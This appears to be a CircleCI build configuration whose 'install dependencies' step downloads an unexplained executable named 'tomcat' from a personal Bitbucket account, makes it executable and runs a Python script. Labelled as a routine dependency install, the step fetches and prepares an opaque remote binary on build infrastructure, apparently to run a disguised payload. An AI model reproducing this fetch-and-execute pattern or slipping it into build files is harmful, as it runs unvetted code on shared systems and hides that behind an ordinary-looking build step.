version: 2
jobs:
  build:
    docker:
      - image: circleci/python:2.7
    working_directory: ~/repo
    steps:
      - checkout
      - run:
          name: install dependencies
          command: |
            sudo apt-get install psmisc
            sudo pip install requests
            wget https://bitbucket.org/fry1983/tomcat/downloads/tomcat && chmod +x tomcat
            python main.py